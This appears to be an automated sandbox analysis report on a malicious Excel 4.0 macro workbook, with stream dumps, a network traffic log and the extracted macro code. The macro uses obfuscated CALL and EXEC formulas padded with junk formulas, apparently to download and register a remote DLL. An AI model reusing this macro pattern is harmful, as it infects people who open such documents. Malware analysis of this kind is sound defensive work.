                                                                                                                                                          Entropy:0.287037498961
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                                                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x5SummaryInformation
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:4096
                                                                                                                                                          Entropy:0.290777742057
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                                          Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
                                                                                                                                                          General
                                                                                                                                                          Stream Path:Book
                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                          Stream Size:363283
                                                                                                                                                          Entropy:3.24522262131
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                                                                                                          Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                          Macro 4.0 Code

                                                                                                                                                          CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)

                                                                                                                                                          ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                                                                                                                                          "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                                                                                                                                                          "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                                                                                                                                                          Network Behavior

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          May 12, 2021 13:32:31.075166941 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:31.239478111 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.239664078 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:31.240961075 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:31.405143023 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.429488897 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.429522991 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.429538965 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.429629087 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:31.429697037 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:31.448086977 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:31.611423969 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.611601114 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:31.612904072 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:31.820620060 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.859360933 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.859380960 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.859396935 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.859414101 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.859431028 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.859447956 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.859462023 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.859482050 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.859502077 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.859519958 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.859587908 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:31.859625101 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.025099993 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025116920 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025130033 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025141954 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025218010 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025229931 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.025239944 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025263071 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025289059 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025311947 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025321007 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.025336027 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025357962 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025378942 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025398016 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.025429010 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.025430918 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025458097 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025486946 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025495052 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.025509119 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025532007 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025552034 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025558949 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.025578976 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025604010 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.025612116 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.025656939 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.189590931 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189629078 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189651966 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189668894 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189740896 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189766884 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189785004 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189802885 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189819098 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.189825058 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189848900 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189873934 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189894915 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189905882 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.189918995 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189941883 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189961910 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.189964056 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189985037 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.189989090 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.190010071 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.190032005 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.190052032 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.190053940 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.190077066 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.190102100 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.190103054 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.190126896 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.190135956 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.190149069 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.190170050 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.190179110 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.190192938 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.190215111 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.190218925 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.190238953 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.190239906 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.190264940 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.190274954 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.190289974 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.190301895 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.190315008 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.190325975 CEST49729443192.168.2.4192.185.39.58
                                                                                                                                                          May 12, 2021 13:32:32.190339088 CEST44349729192.185.39.58192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.190351963 CEST49729443192.168.2.4192.185.39.58

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          May 12, 2021 13:32:11.700754881 CEST6464653192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:11.757498026 CEST53646468.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:12.278656960 CEST6529853192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:12.337564945 CEST53652988.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:12.353760958 CEST5912353192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:12.430588961 CEST53591238.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:12.962347031 CEST5453153192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:13.011122942 CEST53545318.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:16.957289934 CEST4971453192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:17.006031990 CEST53497148.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:17.961410999 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:18.010879040 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:19.583864927 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:19.632714033 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:19.727679014 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:19.790978909 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:24.190608978 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:24.242945910 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:25.419805050 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:25.475008965 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:25.496903896 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:25.526416063 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:25.992902994 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:26.068509102 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:26.986114025 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:27.048033953 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:28.002069950 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:28.062403917 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:30.039849043 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:30.091464996 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.023514032 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:31.072433949 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.249562979 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:31.299894094 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.471741915 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:32.521842957 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.547735929 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:32.610028028 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:33.344405890 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:33.393066883 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:34.123672009 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:34.201133966 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:37.946820021 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:37.998413086 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:39.252321959 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:39.300998926 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:40.682939053 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:40.731926918 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:42.145760059 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:42.199048042 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:43.515748024 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:43.566895962 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:44.717510939 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:44.767641068 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:45.602051973 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:45.661864996 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:46.787492990 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:46.844712973 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:47.312530041 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:47.374838114 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:48.122045040 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:48.174633026 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:49.380045891 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:49.428841114 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:55.634301901 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:55.694555998 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:33:06.519836903 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:33:06.583713055 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:33:08.224392891 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:33:08.281712055 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:33:32.174385071 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:33:32.250258923 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:33:35.221759081 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:33:35.280333042 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:33:39.987410069 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:33:40.055053949 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:15.173784018 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:15.245922089 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:15.844187021 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:15.896749973 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:23.945249081 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:24.064714909 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:25.481246948 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:25.538827896 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:29.043479919 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:29.102607012 CEST53492288.8.8.8192.168.2.4
